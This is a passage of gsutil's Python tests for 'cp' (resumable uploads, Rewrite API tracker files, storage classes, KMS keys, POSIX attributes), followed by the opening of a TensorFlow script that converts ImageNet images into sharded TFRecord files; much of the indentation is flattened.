self.assertFalse(os.path.isfile(tracker_filename))
with open(fpath, 'rb') as f:
self.assertEqual(f.read(), b'abcd' * self.halt_size)
@SkipForS3('No resumable upload support for S3.')
def test_cp_resumable_upload_start_over_http_error(self):
for start_over_error in (
403, # If user doesn't have storage.buckets.get access to dest bucket.
404, # If the dest bucket exists, but the dest object does not.
410): # If the service tells us to restart the upload from scratch.
self.start_over_error_test_helper(start_over_error)
def start_over_error_test_helper(self, http_error_num):
bucket_uri = self.CreateBucket()
# The object contents need to be fairly large to avoid the race condition
    # where the contents finish uploading before we artificially halt the copy.
rand_chars = get_random_ascii_chars(size=(ONE_MIB * 4))
fpath = self.CreateTempFile(contents=rand_chars)
boto_config_for_test = ('GSUtil', 'resumable_threshold', str(ONE_KIB))
if self.test_api == ApiSelector.JSON:
test_callback_file = self.CreateTempFile(
contents=pickle.dumps(_JSONForceHTTPErrorCopyCallbackHandler(5, 404)))
elif self.test_api == ApiSelector.XML:
test_callback_file = self.CreateTempFile(contents=pickle.dumps(
_XMLResumableUploadStartOverCopyCallbackHandler(5)))
with SetBotoConfigForTest([boto_config_for_test]):
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file, fpath,
suri(bucket_uri)
],
return_stderr=True)
self.assertIn('Restarting upload of', stderr)
  def test_cp_minus_c(self):
    """Tests that cp -c continues copying remaining sources after an error."""
bucket_uri = self.CreateBucket()
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=b'foo')
self.RunGsUtil([
'cp', '-c',
suri(bucket_uri) + '/foo2',
suri(object_uri),
suri(bucket_uri) + '/dir/'
],
expected_status=1)
self.RunGsUtil(['stat', '%s/dir/foo' % suri(bucket_uri)])
def test_rewrite_cp(self):
"""Tests the JSON Rewrite API."""
if self.test_api == ApiSelector.XML:
return unittest.skip('Rewrite API is only supported in JSON.')
bucket_uri = self.CreateBucket()
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=b'bar')
gsutil_api = GcsJsonApi(BucketStorageUri, logging.getLogger(),
DiscardMessagesQueue(), self.default_provider)
key = object_uri.get_key()
src_obj_metadata = apitools_messages.Object(name=key.name,
bucket=key.bucket.name,
contentType=key.content_type)
dst_obj_metadata = apitools_messages.Object(
bucket=src_obj_metadata.bucket,
name=self.MakeTempName('object'),
contentType=src_obj_metadata.contentType)
gsutil_api.CopyObject(src_obj_metadata, dst_obj_metadata)
self.assertEqual(
gsutil_api.GetObjectMetadata(src_obj_metadata.bucket,
src_obj_metadata.name,
fields=['customerEncryption',
'md5Hash']).md5Hash,
gsutil_api.GetObjectMetadata(dst_obj_metadata.bucket,
dst_obj_metadata.name,
fields=['customerEncryption',
'md5Hash']).md5Hash,
'Error: Rewritten object\'s hash doesn\'t match source object.')
def test_rewrite_cp_resume(self):
"""Tests the JSON Rewrite API, breaking and resuming via a tracker file."""
if self.test_api == ApiSelector.XML:
return unittest.skip('Rewrite API is only supported in JSON.')
bucket_uri = self.CreateBucket()
# Second bucket needs to be a different storage class so the service
# actually rewrites the bytes.
bucket_uri2 = self.CreateBucket(
storage_class='durable_reduced_availability')
# maxBytesPerCall must be >= 1 MiB, so create an object > 2 MiB because we
    # need 2 responses from the service: 1 success, 1 failure prior to
# completion.
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=(b'12' * ONE_MIB) + b'bar',
prefer_json_api=True)
gsutil_api = GcsJsonApi(BucketStorageUri, logging.getLogger(),
DiscardMessagesQueue(), self.default_provider)
key = object_uri.get_key()
src_obj_metadata = apitools_messages.Object(name=key.name,
bucket=key.bucket.name,
contentType=key.content_type,
etag=key.etag.strip('"\''))
dst_obj_name = self.MakeTempName('object')
dst_obj_metadata = apitools_messages.Object(
bucket=bucket_uri2.bucket_name,
name=dst_obj_name,
contentType=src_obj_metadata.contentType)
tracker_file_name = GetRewriteTrackerFilePath(src_obj_metadata.bucket,
src_obj_metadata.name,
dst_obj_metadata.bucket,
dst_obj_metadata.name,
self.test_api)
try:
try:
gsutil_api.CopyObject(src_obj_metadata,
dst_obj_metadata,
progress_callback=HaltingRewriteCallbackHandler(
ONE_MIB * 2).call,
max_bytes_per_call=ONE_MIB)
self.fail('Expected RewriteHaltException.')
except RewriteHaltException:
pass
# Tracker file should be left over.
self.assertTrue(os.path.exists(tracker_file_name))
# Now resume. Callback ensures we didn't start over.
gsutil_api.CopyObject(
src_obj_metadata,
dst_obj_metadata,
progress_callback=EnsureRewriteResumeCallbackHandler(ONE_MIB *
2).call,
max_bytes_per_call=ONE_MIB)
# Copy completed; tracker file should be deleted.
self.assertFalse(os.path.exists(tracker_file_name))
self.assertEqual(
gsutil_api.GetObjectMetadata(src_obj_metadata.bucket,
src_obj_metadata.name,
fields=['customerEncryption',
'md5Hash']).md5Hash,
gsutil_api.GetObjectMetadata(dst_obj_metadata.bucket,
dst_obj_metadata.name,
fields=['customerEncryption',
'md5Hash']).md5Hash,
'Error: Rewritten object\'s hash doesn\'t match source object.')
finally:
# Clean up if something went wrong.
DeleteTrackerFile(tracker_file_name)
def test_rewrite_cp_resume_source_changed(self):
"""Tests that Rewrite starts over when the source object has changed."""
if self.test_api == ApiSelector.XML:
return unittest.skip('Rewrite API is only supported in JSON.')
bucket_uri = self.CreateBucket()
# Second bucket needs to be a different storage class so the service
# actually rewrites the bytes.
bucket_uri2 = self.CreateBucket(
storage_class='durable_reduced_availability')
# maxBytesPerCall must be >= 1 MiB, so create an object > 2 MiB because we
    # need 2 responses from the service: 1 success, 1 failure prior to
# completion.
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=(b'12' * ONE_MIB) + b'bar',
prefer_json_api=True)
gsutil_api = GcsJsonApi(BucketStorageUri, logging.getLogger(),
DiscardMessagesQueue(), self.default_provider)
key = object_uri.get_key()
src_obj_metadata = apitools_messages.Object(name=key.name,
bucket=key.bucket.name,
contentType=key.content_type,
etag=key.etag.strip('"\''))
dst_obj_name = self.MakeTempName('object')
dst_obj_metadata = apitools_messages.Object(
bucket=bucket_uri2.bucket_name,
name=dst_obj_name,
contentType=src_obj_metadata.contentType)
tracker_file_name = GetRewriteTrackerFilePath(src_obj_metadata.bucket,
src_obj_metadata.name,
dst_obj_metadata.bucket,
dst_obj_metadata.name,
self.test_api)
try:
try:
gsutil_api.CopyObject(src_obj_metadata,
dst_obj_metadata,
progress_callback=HaltingRewriteCallbackHandler(
ONE_MIB * 2).call,
max_bytes_per_call=ONE_MIB)
self.fail('Expected RewriteHaltException.')
except RewriteHaltException:
pass
# Overwrite the original object.
object_uri2 = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=b'bar',
prefer_json_api=True)
key2 = object_uri2.get_key()
src_obj_metadata2 = apitools_messages.Object(
name=key2.name,
bucket=key2.bucket.name,
contentType=key2.content_type,
etag=key2.etag.strip('"\''))
# Tracker file for original object should still exist.
self.assertTrue(os.path.exists(tracker_file_name))
# Copy the new object.
gsutil_api.CopyObject(src_obj_metadata2,
dst_obj_metadata,
max_bytes_per_call=ONE_MIB)
# Copy completed; original tracker file should be deleted.
self.assertFalse(os.path.exists(tracker_file_name))
self.assertEqual(
gsutil_api.GetObjectMetadata(src_obj_metadata2.bucket,
src_obj_metadata2.name,
fields=['customerEncryption',
'md5Hash']).md5Hash,
gsutil_api.GetObjectMetadata(dst_obj_metadata.bucket,
dst_obj_metadata.name,
fields=['customerEncryption',
'md5Hash']).md5Hash,
'Error: Rewritten object\'s hash doesn\'t match source object.')
finally:
# Clean up if something went wrong.
DeleteTrackerFile(tracker_file_name)
def test_rewrite_cp_resume_command_changed(self):
"""Tests that Rewrite starts over when the arguments changed."""
if self.test_api == ApiSelector.XML:
return unittest.skip('Rewrite API is only supported in JSON.')
bucket_uri = self.CreateBucket()
# Second bucket needs to be a different storage class so the service
# actually rewrites the bytes.
bucket_uri2 = self.CreateBucket(
storage_class='durable_reduced_availability')
# maxBytesPerCall must be >= 1 MiB, so create an object > 2 MiB because we
    # need 2 responses from the service: 1 success, 1 failure prior to
# completion.
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=(b'12' * ONE_MIB) + b'bar',
prefer_json_api=True)
gsutil_api = GcsJsonApi(BucketStorageUri, logging.getLogger(),
DiscardMessagesQueue(), self.default_provider)
key = object_uri.get_key()
src_obj_metadata = apitools_messages.Object(name=key.name,
bucket=key.bucket.name,
contentType=key.content_type,
etag=key.etag.strip('"\''))
dst_obj_name = self.MakeTempName('object')
dst_obj_metadata = apitools_messages.Object(
bucket=bucket_uri2.bucket_name,
name=dst_obj_name,
contentType=src_obj_metadata.contentType)
tracker_file_name = GetRewriteTrackerFilePath(src_obj_metadata.bucket,
src_obj_metadata.name,
dst_obj_metadata.bucket,
dst_obj_metadata.name,
self.test_api)
try:
try:
gsutil_api.CopyObject(src_obj_metadata,
dst_obj_metadata,
canned_acl='private',
progress_callback=HaltingRewriteCallbackHandler(
ONE_MIB * 2).call,
max_bytes_per_call=ONE_MIB)
self.fail('Expected RewriteHaltException.')
except RewriteHaltException:
pass
# Tracker file for original object should still exist.
self.assertTrue(os.path.exists(tracker_file_name))
# Copy the same object but with different call parameters.
gsutil_api.CopyObject(src_obj_metadata,
dst_obj_metadata,
canned_acl='public-read',
max_bytes_per_call=ONE_MIB)
# Copy completed; original tracker file should be deleted.
self.assertFalse(os.path.exists(tracker_file_name))
new_obj_metadata = gsutil_api.GetObjectMetadata(
dst_obj_metadata.bucket,
dst_obj_metadata.name,
fields=['acl', 'customerEncryption', 'md5Hash'])
self.assertEqual(
gsutil_api.GetObjectMetadata(src_obj_metadata.bucket,
src_obj_metadata.name,
fields=['customerEncryption',
'md5Hash']).md5Hash,
new_obj_metadata.md5Hash,
'Error: Rewritten object\'s hash doesn\'t match source object.')
# New object should have a public-read ACL from the second command.
found_public_acl = False
for acl_entry in new_obj_metadata.acl:
if acl_entry.entity == 'allUsers':
found_public_acl = True
self.assertTrue(found_public_acl,
'New object was not written with a public ACL.')
finally:
# Clean up if something went wrong.
DeleteTrackerFile(tracker_file_name)
@unittest.skipIf(IS_WINDOWS, 'POSIX attributes not available on Windows.')
@unittest.skipUnless(UsingCrcmodExtension(), 'Test requires fast crcmod.')
def test_cp_preserve_posix_bucket_to_dir_no_errors(self):
"""Tests use of the -P flag with cp from a bucket to a local dir.
Specifically tests combinations of POSIX attributes in metadata that will
pass validation.
"""
bucket_uri = self.CreateBucket()
tmpdir = self.CreateTempDir()
TestCpMvPOSIXBucketToLocalNoErrors(self, bucket_uri, tmpdir, is_cp=True)
@unittest.skipIf(IS_WINDOWS, 'POSIX attributes not available on Windows.')
def test_cp_preserve_posix_bucket_to_dir_errors(self):
"""Tests use of the -P flag with cp from a bucket to a local dir.
Specifically, combinations of POSIX attributes in metadata that will fail
validation.
"""
bucket_uri = self.CreateBucket()
tmpdir = self.CreateTempDir()
obj = self.CreateObject(bucket_uri=bucket_uri,
object_name='obj',
contents=b'obj')
TestCpMvPOSIXBucketToLocalErrors(self, bucket_uri, obj, tmpdir, is_cp=True)
@unittest.skipIf(IS_WINDOWS, 'POSIX attributes not available on Windows.')
  def test_cp_preserve_posix_dir_to_bucket_no_errors(self):
"""Tests use of the -P flag with cp from a local dir to a bucket."""
bucket_uri = self.CreateBucket()
TestCpMvPOSIXLocalToBucketNoErrors(self, bucket_uri, is_cp=True)
def test_cp_minus_s_to_non_cloud_dest_fails(self):
"""Test that cp -s operations to a non-cloud destination are prevented."""
local_file = self.CreateTempFile(contents=b'foo')
dest_dir = self.CreateTempDir()
stderr = self.RunGsUtil(['cp', '-s', 'standard', local_file, dest_dir],
expected_status=1,
return_stderr=True)
self.assertIn('Cannot specify storage class for a non-cloud destination:',
stderr)
# TODO: Remove @skip annotation from this test once we upgrade to the Boto
# version that parses the storage class header for HEAD Object responses.
@SkipForXML('Need Boto version > 2.46.1')
def test_cp_specify_nondefault_storage_class(self):
bucket_uri = self.CreateBucket()
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=b'foo')
object2_suri = suri(object_uri) + 'bar'
# Specify storage class name as mixed case here to ensure that it
# gets normalized to uppercase (S3 would return an error otherwise), and
# that using the normalized case is accepted by each API.
nondefault_storage_class = {
's3': 'Standard_iA',
'gs': 'durable_REDUCED_availability'
}
storage_class = nondefault_storage_class[self.default_provider]
self.RunGsUtil(['cp', '-s', storage_class, suri(object_uri), object2_suri])
stdout = self.RunGsUtil(['stat', object2_suri], return_stdout=True)
self.assertRegexpMatchesWithFlags(stdout,
r'Storage class:\s+%s' % storage_class,
flags=re.IGNORECASE)
@SkipForS3('Test uses gs-specific storage classes.')
def test_cp_sets_correct_dest_storage_class(self):
"""Tests that object storage class is set correctly with and without -s."""
# Use a non-default storage class as the default for the bucket.
bucket_uri = self.CreateBucket(storage_class='nearline')
# Ensure storage class is set correctly for a local-to-cloud copy.
local_fname = 'foo-orig'
local_fpath = self.CreateTempFile(contents=b'foo', file_name=local_fname)
foo_cloud_suri = suri(bucket_uri) + '/' + local_fname
self.RunGsUtil(['cp', '-s', 'standard', local_fpath, foo_cloud_suri])
with SetBotoConfigForTest([('GSUtil', 'prefer_api', 'json')]):
stdout = self.RunGsUtil(['stat', foo_cloud_suri], return_stdout=True)
self.assertRegexpMatchesWithFlags(stdout,
r'Storage class:\s+STANDARD',
flags=re.IGNORECASE)
# Ensure storage class is set correctly for a cloud-to-cloud copy when no
# destination storage class is specified.
foo_nl_suri = suri(bucket_uri) + '/foo-nl'
self.RunGsUtil(['cp', foo_cloud_suri, foo_nl_suri])
# TODO: Remove with-clause after adding storage class parsing in Boto.
with SetBotoConfigForTest([('GSUtil', 'prefer_api', 'json')]):
stdout = self.RunGsUtil(['stat', foo_nl_suri], return_stdout=True)
self.assertRegexpMatchesWithFlags(stdout,
r'Storage class:\s+NEARLINE',
flags=re.IGNORECASE)
# Ensure storage class is set correctly for a cloud-to-cloud copy when a
# non-bucket-default storage class is specified.
foo_std_suri = suri(bucket_uri) + '/foo-std'
self.RunGsUtil(['cp', '-s', 'standard', foo_nl_suri, foo_std_suri])
# TODO: Remove with-clause after adding storage class parsing in Boto.
with SetBotoConfigForTest([('GSUtil', 'prefer_api', 'json')]):
stdout = self.RunGsUtil(['stat', foo_std_suri], return_stdout=True)
self.assertRegexpMatchesWithFlags(stdout,
r'Storage class:\s+STANDARD',
flags=re.IGNORECASE)
def authorize_project_to_use_testing_kms_key(
self, key_name=testcase.KmsTestingResources.CONSTANT_KEY_NAME):
# Make sure our keyRing and cryptoKey exist.
keyring_fqn = self.kms_api.CreateKeyRing(
PopulateProjectId(None),
testcase.KmsTestingResources.KEYRING_NAME,
location=testcase.KmsTestingResources.KEYRING_LOCATION)
key_fqn = self.kms_api.CreateCryptoKey(keyring_fqn, key_name)
# Make sure that the service account for our default project is authorized
# to use our test KMS key.
self.RunGsUtil(['kms', 'authorize', '-k', key_fqn])
return key_fqn
@SkipForS3('Test uses gs-specific KMS encryption')
def test_kms_key_correctly_applied_to_dst_obj_from_src_with_no_key(self):
bucket_uri = self.CreateBucket()
obj1_name = 'foo'
obj2_name = 'bar'
key_fqn = self.authorize_project_to_use_testing_kms_key()
# Create the unencrypted object, then copy it, specifying a KMS key for the
# new object.
obj_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name=obj1_name,
contents=b'foo')
with SetBotoConfigForTest([('GSUtil', 'encryption_key', key_fqn)]):
self.RunGsUtil(
['cp', suri(obj_uri),
'%s/%s' % (suri(bucket_uri), obj2_name)])
# Make sure the new object is encrypted with the specified KMS key.
with SetBotoConfigForTest([('GSUtil', 'prefer_api', 'json')]):
self.AssertObjectUsesCMEK('%s/%s' % (suri(bucket_uri), obj2_name),
key_fqn)
@SkipForS3('Test uses gs-specific KMS encryption')
def test_kms_key_correctly_applied_to_dst_obj_from_local_file(self):
bucket_uri = self.CreateBucket()
fpath = self.CreateTempFile(contents=b'abcd')
obj_name = 'foo'
obj_suri = suri(bucket_uri) + '/' + obj_name
key_fqn = self.authorize_project_to_use_testing_kms_key()
with SetBotoConfigForTest([('GSUtil', 'encryption_key', key_fqn)]):
self.RunGsUtil(['cp', fpath, obj_suri])
with SetBotoConfigForTest([('GSUtil', 'prefer_api', 'json')]):
self.AssertObjectUsesCMEK(obj_suri, key_fqn)
@SkipForS3('Test uses gs-specific KMS encryption')
def test_kms_key_works_with_resumable_upload(self):
resumable_threshold = 1024 * 1024 # 1M
bucket_uri = self.CreateBucket()
fpath = self.CreateTempFile(contents=b'a' * resumable_threshold)
obj_name = 'foo'
obj_suri = suri(bucket_uri) + '/' + obj_name
key_fqn = self.authorize_project_to_use_testing_kms_key()
with SetBotoConfigForTest([('GSUtil', 'encryption_key', key_fqn),
('GSUtil', 'resumable_threshold',
str(resumable_threshold))]):
self.RunGsUtil(['cp', fpath, obj_suri])
with SetBotoConfigForTest([('GSUtil', 'prefer_api', 'json')]):
self.AssertObjectUsesCMEK(obj_suri, key_fqn)
@SkipForS3('Test uses gs-specific KMS encryption')
def test_kms_key_correctly_applied_to_dst_obj_from_src_with_diff_key(self):
bucket_uri = self.CreateBucket()
obj1_name = 'foo'
obj2_name = 'bar'
key1_fqn = self.authorize_project_to_use_testing_kms_key()
key2_fqn = self.authorize_project_to_use_testing_kms_key(
key_name=testcase.KmsTestingResources.CONSTANT_KEY_NAME2)
obj1_suri = suri(
self.CreateObject(bucket_uri=bucket_uri,
object_name=obj1_name,
contents=b'foo',
kms_key_name=key1_fqn))
# Copy the object to the same bucket, specifying a different key to be used.
obj2_suri = '%s/%s' % (suri(bucket_uri), obj2_name)
with SetBotoConfigForTest([('GSUtil', 'encryption_key', key2_fqn)]):
self.RunGsUtil(['cp', obj1_suri, obj2_suri])
# Ensure the new object has the different key.
with SetBotoConfigForTest([('GSUtil', 'prefer_api', 'json')]):
self.AssertObjectUsesCMEK(obj2_suri, key2_fqn)
@SkipForS3('Test uses gs-specific KMS encryption')
@SkipForXML('Copying KMS-encrypted objects prohibited with XML API')
def test_kms_key_not_applied_to_nonkms_dst_obj_from_src_with_kms_key(self):
bucket_uri = self.CreateBucket()
obj1_name = 'foo'
obj2_name = 'bar'
key1_fqn = self.authorize_project_to_use_testing_kms_key()
obj1_suri = suri(
self.CreateObject(bucket_uri=bucket_uri,
object_name=obj1_name,
contents=b'foo',
kms_key_name=key1_fqn))
# Copy the object to the same bucket, not specifying any KMS key.
obj2_suri = '%s/%s' % (suri(bucket_uri), obj2_name)
self.RunGsUtil(['cp', obj1_suri, obj2_suri])
# Ensure the new object has no KMS key.
with SetBotoConfigForTest([('GSUtil', 'prefer_api', 'json')]):
self.AssertObjectUnencrypted(obj2_suri)
@unittest.skipUnless(
IS_WINDOWS,
'Only Windows paths need to be normalized to use backslashes instead of '
'forward slashes.')
def test_windows_path_with_back_and_forward_slash_is_normalized(self):
# Prior to this test and its corresponding fix, running
# `gsutil cp dir/./file gs://bucket` would result in an object whose name
# was "dir/./file", rather than just "file", as Windows tried to split on
    # the path component separator "\" instead of "/".
tmp_dir = self.CreateTempDir()
self.CreateTempFile(tmpdir=tmp_dir, file_name='obj1', contents=b'foo')
bucket_uri = self.CreateBucket()
self.RunGsUtil(['cp', '%s\\./obj1' % tmp_dir, suri(bucket_uri)])
# If the destination path was not created correctly, this stat call should
# fail with a non-zero exit code because the specified object won't exist.
self.RunGsUtil(['stat', '%s/obj1' % suri(bucket_uri)])
def test_cp_minus_m_streaming_upload(self):
"""Tests that cp -m - anything is disallowed."""
stderr = self.RunGsUtil(['-m', 'cp', '-', 'file'],
return_stderr=True,
expected_status=1)
self.assertIn(
'CommandException: Cannot upload from a stream when using gsutil -m',
stderr)
@SequentialAndParallelTransfer
def test_cp_overwrites_existing_destination(self):
key_uri = self.CreateObject(contents=b'foo')
fpath = self.CreateTempFile(contents=b'bar')
stderr = self.RunGsUtil(['cp', suri(key_uri), fpath], return_stderr=True)
with open(fpath, 'rb') as f:
self.assertEqual(f.read(), b'foo')
@SequentialAndParallelTransfer
def test_downloads_are_reliable_with_more_than_one_gsutil_instance(self):
test_file_count = 10
temporary_directory = self.CreateTempDir()
bucket_uri = self.CreateBucket(test_objects=test_file_count)
cp_args = ['cp', suri(bucket_uri, '*'), temporary_directory]
threads = []
for _ in range(2):
thread = threading.Thread(target=self.RunGsUtil, args=[cp_args])
thread.start()
threads.append(thread)
[t.join() for t in threads]
self.assertEqual(len(os.listdir(temporary_directory)), test_file_count)
class TestCpUnitTests(testcase.GsUtilUnitTestCase):
"""Unit tests for gsutil cp."""
def testDownloadWithNoHashAvailable(self):
"""Tests a download with no valid server-supplied hash."""
# S3 should have a special message for non-MD5 etags.
bucket_uri = self.CreateBucket(provider='s3')
object_uri = self.CreateObject(bucket_uri=bucket_uri, contents=b'foo')
object_uri.get_key().etag = '12345' # Not an MD5
dst_dir = self.CreateTempDir()
log_handler = self.RunCommand('cp', [suri(object_uri), dst_dir],
return_log_handler=True)
warning_messages = log_handler.messages['warning']
    self.assertEqual(2, len(warning_messages))
self.assertRegex(
warning_messages[0], r'Non-MD5 etag \(12345\) present for key .*, '
r'data integrity checks are not possible')
self.assertIn('Integrity cannot be assured', warning_messages[1])
def testDownloadWithDestinationEndingWithDelimiterRaisesError(self):
"""Tests a download with no valid server-supplied hash."""
# S3 should have a special message for non-MD5 etags.
bucket_uri = self.CreateBucket(provider='s3')
object_uri = self.CreateObject(bucket_uri=bucket_uri, contents=b'foo')
destination_path = 'random_dir' + os.path.sep
with self.assertRaises(InvalidUrlError) as error:
self.RunCommand('cp', [suri(object_uri), destination_path])
    self.assertEqual(
        str(error.exception), 'Invalid destination path: random_dir/')
def test_object_and_prefix_same_name(self):
bucket_uri = self.CreateBucket()
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=b'foo')
self.CreateObject(bucket_uri=bucket_uri,
object_name='foo/bar',
contents=b'bar')
fpath = self.CreateTempFile()
# MockKey doesn't support hash_algs, so the MD5 will not match.
with SetBotoConfigForTest([('GSUtil', 'check_hashes', 'never')]):
self.RunCommand('cp', [suri(object_uri), fpath])
with open(fpath, 'rb') as f:
self.assertEqual(f.read(), b'foo')
def test_cp_upload_respects_no_hashes(self):
bucket_uri = self.CreateBucket()
fpath = self.CreateTempFile(contents=b'abcd')
with SetBotoConfigForTest([('GSUtil', 'check_hashes', 'never')]):
log_handler = self.RunCommand('cp', [fpath, suri(bucket_uri)],
return_log_handler=True)
warning_messages = log_handler.messages['warning']
    self.assertEqual(1, len(warning_messages))
self.assertIn('Found no hashes to validate object upload',
warning_messages[0])
|
build_imagenet_data.py
|
#!/usr/bin/python
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Converts ImageNet data to TFRecords file format with Example protos.
The raw ImageNet data set is expected to reside in JPEG files located in the
following directory structure.
data_dir/n01440764/ILSVRC2012_val_00000293.JPEG
data_dir/n01440764/ILSVRC2012_val_00000543.JPEG
...
where 'n01440764' is the unique synset label associated with
these images.
The training data set consists of 1000 sub-directories (i.e. labels)
each containing 1200 JPEG images for a total of 1.2M JPEG images.
The evaluation data set consists of 1000 sub-directories (i.e. labels)
each containing 50 JPEG images for a total of 50K JPEG images.
This TensorFlow script converts the training and evaluation data into
a sharded data set consisting of 1024 and 128 TFRecord files, respectively.
train_directory/train-00000-of-01024
train_directory/train-00001-of-01024
...
train_directory/train-01023-of-01024
and
validation_directory/validation-00000-of-00128
validation_directory/validation-00001-of-00128
...
validation_directory/validation-00127-of-00128
Each validation TFRecord file contains ~390 records. Each training TFRecord
file contains ~1250 records. Each record within the TFRecord file is a
serialized Example proto. The Example proto contains the following fields:
image/encoded: string containing JPEG encoded image in RGB colorspace
image/height: integer, image height in pixels
image/width: integer, image width in pixels
image/colorspace: string, specifying the colorspace, always 'RGB'
image/channels: integer, specifying the number of channels, always 3
image/format: string, specifying the format, always 'JPEG'
image/filename: string containing the basename of the image file
e.g. 'n01440764_10026.JPEG' or 'ILSVRC2012_val_00000293.JPEG'
image/class/label: integer specifying the index in a classification layer.
The label ranges from [1, 1000] where 0 is not used.
image/class/synset: string specifying the unique ID of the label,
e.g. 'n01440764'
image/class/text: string specifying the human-readable version of the label
e.g. 'red fox, Vulpes vulpes'
  image/object/bbox/xmin: list of floats specifying the 0+ human annotated
    bounding boxes
  image/object/bbox/xmax: list of floats specifying the 0+ human annotated
    bounding boxes
  image/object/bbox/ymin: list of floats specifying the 0+ human annotated
    bounding boxes
  image/object/bbox/ymax: list of floats specifying the 0+ human annotated
    bounding boxes
image/object/bbox/label: integer specifying the index in a classification
layer. The label ranges from [1, 1000] where 0 is not used. Note this is
always identical to the image label.
Note that the length of xmin is identical to the length of xmax, ymin and ymax
for each example.
Running this script using 16 threads may take around ~2.5 hours on an HP Z420.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from datetime import datetime
import os
import random
import sys
import threading
import numpy as np
import six
import tensorflow as tf
tf.app.flags.DEFINE_string('train_directory', '/tmp/',
'Training data directory')
tf.app.flags.DEFINE_string('validation_directory', '/tmp/',
'Validation data directory')
tf.app.flags.DEFINE_string('output_directory', '/tmp/',
'Output data directory')
tf.app.flags.DEFINE_integer('train_shards', 1024,
'Number of shards in training TFRecord files.')
tf.app.flags.DEFINE_integer('validation_shards', 128,
'Number of shards in validation TFRecord files.')
tf.app.flags.DEFINE_integer('num_threads', 8,
'Number of threads to preprocess the images.')
# The labels file contains the list of valid labels, one per line.
# Assumes that the file contains entries as such:
# n01440764
# n01443537
# n01484850
# where each line corresponds to a label expressed as a synset. We map
# each synset contained in the file to an integer (based on the alphabetical
# ordering). See below for details.
tf.app.flags.DEFINE_string('labels_file',
'imagenet_lsvrc_2015_synsets.txt',
'Labels file')
# This file contains the mapping from synset to human-readable label.
# Assumes each line of the file looks like:
#
# n02119247 black fox
# n02119359 silver fox
# n02119477 red fox, Vulpes fulva
#
# where each line corresponds to a unique mapping. Note that each line is
# formatted as <synset>\t<human readable label>.
tf.app.flags.DEFINE_string('imagenet_metadata_file',
'imagenet_metadata.txt',
'ImageNet metadata file')
# This file is the output of process_bounding_boxes.py
# Assumes each line of the file looks like:
#
# n00007846_64193.JPEG,0.0060,0.2620,0.7545,0.9940
#
# where each line corresponds to one bounding box annotation associated
# with an image. Each line can be parsed as:
#
# <JPEG file name>, <xmin>, <ymin>, <xmax>, <ymax>
#
# Note that there might exist multiple bounding box annotations associated
# with an image file.
tf.app.flags.DEFINE_string('bounding_box_file',
'./imagenet_2012_bounding_boxes.csv',
'Bounding box file')
FLAGS = tf.app.flags.FLAGS
def _int64_feature(value):
"""Wrapper for inserting int64 features into Example proto."""
if not isinstance(value, list):
value = [value]
return tf.train.Feature(int64_list=tf.train.Int64List(value=value))
def _float_feature(value):
"""Wrapper for inserting float features into Example proto."""
if not isinstance(value, list):
value = [value]
return tf.train.Feature(float_list=tf.train.FloatList(value=value))
def _bytes_feature(value):
"""Wrapper for inserting bytes features into Example proto."""
if six.PY3 and isinstance(value, six.text_type):
value = six.binary_type(value, encoding='utf-8')
return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))
def _convert_to_example(filename, image_buffer, label, synset, human, bbox,
height, width):
"""Build an Example proto for an example.
Args:
filename: string, path to an image file, e.g., '/path/to/example.JPG'
image_buffer: string, JPEG encoding of RGB image
label: integer, identifier for the ground truth for the network
synset: string, unique WordNet ID specifying the label, e.g., 'n02323233'
human: string, human-readable label, e.g., 'red fox, Vulpes vulpes'
    bbox: list of bounding boxes; each box is a list of floats
specifying [xmin, ymin, xmax, ymax]. All boxes are assumed to belong to
the same label as the image label.
height: integer, image height in pixels
width: integer, image width in pixels
Returns:
Example proto
"""
xmin = []
ymin = []
xmax = []
ymax = []
for b in bbox:
assert len(b) == 4
# pylint: disable=expression-not-assigned
[l.append(point) for l, point in zip([xmin, ymin, xmax, ymax], b)]
# pylint: enable=expression-not-assigned
colorspace = 'RGB'
channels = 3
image_format = 'JPEG'
example = tf.train.Example(features=tf.train.Features(feature={
'image/height': _int64_feature(height),
'image/width': _int64_feature(width),
'image/colorspace': _bytes_feature(colorspace),
'image/channels': _int64_feature(channels),
'image/class/label': _int64_feature(label),
'image/class/synset': _bytes_feature(synset),
'image/class/text': _bytes_feature(human),
'image/object/bbox/xmin': _float_feature(xmin),
'image/object/bbox/xmax': _float_feature(xmax),
'image/object/bbox/ymin': _float_feature(ymin),
'image/object/bbox/ymax': _float_feature(ymax),
'image/object/bbox/label': _int64_feature([label] * len(xmin)),
'image/format': _bytes_feature(image_format),
'image/filename': _bytes_feature(os.path.basename(filename)),
'image/encoded': _bytes_feature(image_buffer)}))
return example
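# --- Illustrative sketch (not from the original script) ----------------------
# Reading one serialized record back is the inverse of _convert_to_example;
# the keys below mirror the feature names used above. Assumes the protos are
# written exactly as in this script.
def _read_example_sketch(serialized_example):
  """Return (label, synset, height, width) decoded from a serialized proto."""
  example = tf.train.Example.FromString(serialized_example)
  feature = example.features.feature
  label = feature['image/class/label'].int64_list.value[0]
  synset = feature['image/class/synset'].bytes_list.value[0]
  height = feature['image/height'].int64_list.value[0]
  width = feature['image/width'].int64_list.value[0]
  return label, synset, height, width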
class ImageCoder(object):
"""Helper class that provides TensorFlow image coding utilities."""
def __init__(self):
# Create a single Session to run all image coding calls.
self._sess = tf.Session()
# Initializes function that converts PNG to JPEG data.
